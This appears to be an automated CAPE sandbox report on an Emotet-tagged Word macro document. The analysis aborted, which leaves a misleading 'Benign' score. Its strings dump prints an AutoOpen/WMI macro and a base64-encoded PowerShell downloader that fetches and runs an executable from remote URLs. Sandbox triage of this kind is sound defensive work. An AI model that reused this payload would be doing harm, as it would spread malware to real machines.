Analysis

Category Package Started Completed Duration Log
FILE Emotet 2019-12-03 04:59:33 2019-12-03 04:59:51 18 seconds Show Log
  • Info: Analysis failed: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.
2019-12-03 04:59:34,030 [root] INFO: Date set to: 12-03-19, time set to: 04:59:34, timeout set to: 200
2019-12-03 04:59:34,062 [root] DEBUG: Starting analyzer from: C:\alelevo
2019-12-03 04:59:34,062 [root] DEBUG: Storing results at: C:\xVPKBlAAUL
2019-12-03 04:59:34,062 [root] DEBUG: Pipe server name: \\.\PIPE\KqupvX
2019-12-03 04:59:34,062 [root] INFO: Analysis package "Emotet" has been specified.
2019-12-03 04:59:34,825 [root] DEBUG: Started auxiliary module Browser
2019-12-03 04:59:34,825 [root] DEBUG: Started auxiliary module Curtain
2019-12-03 04:59:34,825 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-12-03 04:59:35,839 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-12-03 04:59:35,855 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-12-03 04:59:35,855 [root] DEBUG: Started auxiliary module DigiSig
2019-12-03 04:59:35,855 [root] DEBUG: Started auxiliary module Disguise
2019-12-03 04:59:35,855 [root] DEBUG: Started auxiliary module Human
2019-12-03 04:59:35,871 [root] DEBUG: Started auxiliary module Screenshots
2019-12-03 04:59:35,871 [root] DEBUG: Started auxiliary module Sysmon
2019-12-03 04:59:35,871 [root] DEBUG: Started auxiliary module Usage
2019-12-03 04:59:35,871 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Emotet
2019-12-03 04:59:35,871 [root] INFO: Analyzer: Package modules.packages.Emotet does not specify a DLL_64 option
2019-12-03 04:59:36,121 [lib.api.process] ERROR: Failed to execute process from path "C:\Users\user\AppData\Local\Temp\5t3ns91coF.exe" with arguments "None" (Error: This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher (ERROR_EXE_MACHINE_TYPE_MISMATCH))
2019-12-03 04:59:36,121 [root] ERROR: Traceback (most recent call last):
  File "C:\alelevo\analyzer.py", line 1332, in <module>
    success = analyzer.run()
  File "C:\alelevo\analyzer.py", line 1151, in run
    "error: {1}".format(package_name, e))
CuckooError: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.
Traceback (most recent call last):
  File "C:\alelevo\analyzer.py", line 1332, in <module>
    success = analyzer.run()
  File "C:\alelevo\analyzer.py", line 1151, in run
    "error: {1}".format(package_name, e))
CuckooError: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.

MalScore

0.0

Benign

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-12-03 04:59:33 2019-12-03 04:59:50

File Details

File Name 45c5114e141a1a6387a538325f15a6e4139aeff1
File Size 181248 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 28 15:01:00 2019, Last Saved Time/Date: Thu Mar 28 15:01:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 8, Security: 0
MD5 3bc04edbff711559c02437ba22d050ec
SHA1 d20b256a6a19e410a16908e8febe08952798eee5
SHA256 ad5faaa82a6caef20722faf6fd1efd2d441b0e8362210d6e57af6ed666b62769
SHA512 b86aedf14b2a41b55f2cb5183b09fd91d96ddb457708a4eed98feb2bfc9368f259a1680dd7256b8739d064b2832383216b835e978dab01b6b1fcb3b7a9bc6185
CRC32 AA070E08
Ssdeep 3072:g77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qxTkKJLHwVEjx5g8:g77HUUUUUUUUUUUUUUUUUUUT52VWTkKN
TrID
  • 54.2% (.DOC) Microsoft Word document (32000/1/3)
  • 32.2% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 13.5% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

No signatures


Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
7Exif
lAA_AGQ1AAAZqAcAxXA
3\A.-
hk@kZ
hk@kZ
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal.dotm
Microsoft Office Word
Title
Attribut
e VB_Nam
e = "PAQ
rmal.Thi
Pre decla
Attribut
e VB_Nam
x0{AE
8C0625-BA
-42CE
C-9F4C17
1B2BCA}{
D26F1D8D
-9AA5-4A
15-9003-
Attribut
e = "lA
x0{8D58
927F-6E2
8-498F-A
9C5-E75B
992FA05B
}{48D459
E1-34DE-
4D74-AAF
PredeHcla
0Templ
ofGGw
0125774
AGDDBD.`H GG1.T
`704352
oZ%"$
Attribut
e VB_Nam
e = "zAQ
nction p
If m@BQBAAo
ZkCAU Th
4BUBc_ /
kAA) -
WZUAoCA
* CDbl(4
.377@589016
CoAAG /
Log(1248
8 XoD_
GUG = QA
ZAAX The
2ZUU_xQ
* CDbl(3
bAABoB
pCall
GetObje
Password
x.wcA@D
cGADAQAA>
acoAXA
fG__QU!
ADUoAAZcZ
nkDccXwA
nw_UoA1U
tQBBAD4B
qBXABZA
cccAwD
_B_var_fB_Akx<
_B_var_BwAUcU
_B_var_u_wBCB
_B_var_wXAkAUXk7
_B_var_KADQZC
Yw_1BAB#
zZZkk_BH
zAAGGX1X
0046}#
2.0#0#C:
\Windows
e2.tlb
omation
!G{2DF
8D04C-5B
icrosoft
Shared\
OFFICE16
D7-CFF9-
rs\ADMIN
I~1\AppD
ata\Loca
ControlTipTextb
*\CNormalrU
winmgmts:Win32_Processat
Tahoma
winmgmts:Win32_ProcessStartup
Tahoma
JABxADQAQQBRAG8ARABDAFoAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG8ANABCAEEAJwAsACcAagBBACcAKQA7ACQAWgBDADQAWABEAHcAPQBuAGAAZQBgAFcAYAAtAE8AYgBKAGUAQwB0ACAAKAAnAE4AZQAnACsAJwB0AC4AVwBlAGIAQwBsACcAKwAnAGkAZQAnACsAJwBuAHQAJwApADsAJAB0AEEAUQBCAGsAUQBYAFUAPQAoACIAewAxADkAfQB7ADQANAB9AHsANAAxAH0AewA4AH0AewAzADAAfQB7ADcAfQB7ADIAMgB9AHsANQB9AHsANAAwAH0AewAyAH0AewAzADIAfQB7ADIAOAB9AHsAMQA3AH0AewAyADkAfQB7ADMAMwB9AHsAMQAxAH0AewAyADUAfQB7ADQAMgB9AHsAMQAzAH0AewAzADQAfQB7ADEANAB9AHsANAAzAH0AewAyADMAfQB7ADMAOAB9AHsAMgA0AH0AewAzAH0AewA0AH0AewA5AH0AewAxADAAfQB7ADMAOQB9AHsAMwAxAH0AewAxADgAfQB7ADEANQB9AHsAMwA3AH0AewAxADIAfQB7ADQANQB9AHsAMwA2AH0AewAyADcAfQB7ADYAfQB7ADEANgB9AHsAMwA1AH0AewAxAH0AewAwAH0AewAyADEAfQB7ADIAMAB9AHsAMgA2AH0AewA0ADYAfQAiAC0AZgAnADIAMAA3ACcALAAnAC8ALwAxADIAMwAuACcALAAnAEAAJwAsACcALgAnACwAJwAyADAAJwAsACcANQAnACwAJwBfACcALAAnAGMAJwAsACcAMQA0ADAAJwAsACcALwB3AHAALQBpAG4AYwBsAHUAZAAnACwAJwBlAHMALwAnACwAJwBpACcALAAnAC4AMgAyACcALAAnAGMAbwBuAHQAJwAsACcALwBRADQAXwBKAC8AQABoAHQAdABwADoAJwAsACcALwAxADYAJwAsACcANQAnACwAJwBwADoALwAnACwAJwBwADoALwAnACwAJwBoAHQAdAAnACwAJwAuADkAOAAvAHcAcAAtAGMAbwAnACwAJwAuADUAMgAnACwAJwBvAG4AdABlAG4AdAAvACcALAAnADIAMwAuADIAJwAsACcAOAAyACcALAAnAC4AcABlAC8AJwAsACcAbgB0ACcALAAnAC8ANAAnACwAJwB0ACcALAAnAC8AYwBvAGwAZQBnAGkAbwBkAGEAJwAsACcALgAxADQAMwAuADIANAA2AC4AMQAyADAALwB3AHAALQAnACwAJwBfAEEALwBAAGgAdAB0ACcALAAnAGgAdAAnACwAJwB2AGkAbgBjACcALAAnAGUAbgB0ACcALAAnAC8AQABoAHQAdABwADoAJwAsACcAMQA2AC8ANgBiAHUAawBlAHcAZgAnACwAJwA1ACcALAAnADAANwAuACcALAAnAGQAJwAsACcATgBfAEUALwAnACwAJwAvAC8AJwAsACcAdwBwAC0AJwAsACcALwAvADEAJwAsACcAcAA6ACcALAAnADcALgA0ADQALgAyACcALAAnAGUAbgB0AC8ATwAzAF8AMQAvACcAKQAuACIAcwBQAGAAbABJAHQAIgAoACcAQAAnACkAOwAkAGoAQQA0AEQAQgBVADQAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAEQARAAnACwAJwBmAEIAJwAsACcAXwBBACcAKQA7ACQAcQBCAEEAQQBBAFEAWABRACAAPQAgACcANQA4ADMAJwA7ACQASwBBAEQAWgBRAEEARABfAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAawBCAEQAbwBBACcALAAnAFEAJwApADsAJABjAHcAdwBCAFoAQQBRAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABxAEIAQQBBAEEAUQBYAFEAKwAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcALgBlACcALAAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABjAF8ANABBAEEAYwBBACAAaQBuACAAJAB0AEEAUQBCAGsAUQBYAFUAKQB7AHQAcgB5AHsAJABaAEMANABYAEQAdwAuACIARABgAE8AVwBOAEwAbwBgAEEAZABmAGAASQBMAGUAIgAoACQAYwBfADQAQQBBAGMAQQAsACAAJABjAHcAdwBCAFoAQQBRACkAOwAkAEgAXwBRAEEAWABRAGMAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAGYAJwAsACcAMQBBAEQAJwAsACcAQQBYADEAJwApADsASQBmACAAKAAoAEcAZQB0AC0AYABJAHQAZQBtACAAJABjAHcAdwBCAFoAQQBRACkALgAiAEwAYABlAG4ARwBUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AGkAbgBgAFYAbwBrAGAAZQAtAEkAYABUAEUATQAgACQAYwB3AHcAQgBaAEEAUQA7ACQATwBYAFEAQgAxAFUAPQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAQQBRAEQAJwAsACcAVwB3AFEAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAeABBAEEANABaAHcAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBQAEEAJwAsACcAbwBBAHcAYwBBACcAKQA7AA==
Tahoma
Tahoma
Tahoma
Tahoma
ell -e
Tahoma
Tahoma
wcAUBA
s1AUCAD
ZBAAQDD
LAAAx4D
pUQ_AQA
SAAAXAAA
lXc4cAAA
EAAGG1AA
Microsoft Forms 2.0 Form
Embedded Object
TahomaAA
Tahoma
EAAGG1
EDQxxQGA
Microsoft Forms 2.0 Form
Embedded Object
PAQ_UUkB
lAAAAZA
VAGDDBD
zAQCox
Document=PAQ_UUkB/&P
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Picture 1
Normal
Default Paragraph Font
Table Normal
No List
Balloon Text
Balloon Text Char
PROJECT.ZAQCOX.AUTOOPEN
Times New Roman
Symbol
Arial
Calibri
Tahoma
Calibri Light
Cambria Math
Root Entry
1Table
WordDocument
SummaryInformation
DocumentSummaryInformation
Macros
PAQ_UUkB
__SRP_3
__SRP_2
VAGDDBD
lAAAAZA
zAQCox
_VBA_PROJECT
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{71B8D0D7-CFF9-4CBC-9DED-F13C852D434A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
__SRP_0
__SRP_1
lAAAAZA
CompObj
VBFrame
VAGDDBD
CompObj
VBFrame
BPAQ_UUkB
AlAAAAZA
DVAGDDBD
xzAQCox
PROJECTwm
PROJECT
CompObj
This file is not on VirusTotal.

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 1.339 seconds )

  • 1.012 Strings
  • 0.097 TrID
  • 0.095 CAPE
  • 0.086 TargetInfo
  • 0.036 Deduplicate
  • 0.007 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.069 seconds )

  • 0.012 antiav_detectreg
  • 0.008 ransomware_files
  • 0.005 persistence_autorun
  • 0.005 antiav_detectfile
  • 0.003 browser_security
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 tinba_behavior
  • 0.002 rat_nanocore
  • 0.002 cerber_behavior
  • 0.002 antianalysis_detectfile
  • 0.002 antianalysis_detectreg
  • 0.002 antivm_vbox_files
  • 0.002 geodo_banking_trojan
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 betabot_behavior
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 modify_proxy
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 masquerade_process_name

Reporting ( 0.0 seconds )

Task ID 115333
Mongo ID 5de5ebcb38b1e1182f3b07c8
Cuckoo release 1.3-CAPE
Delete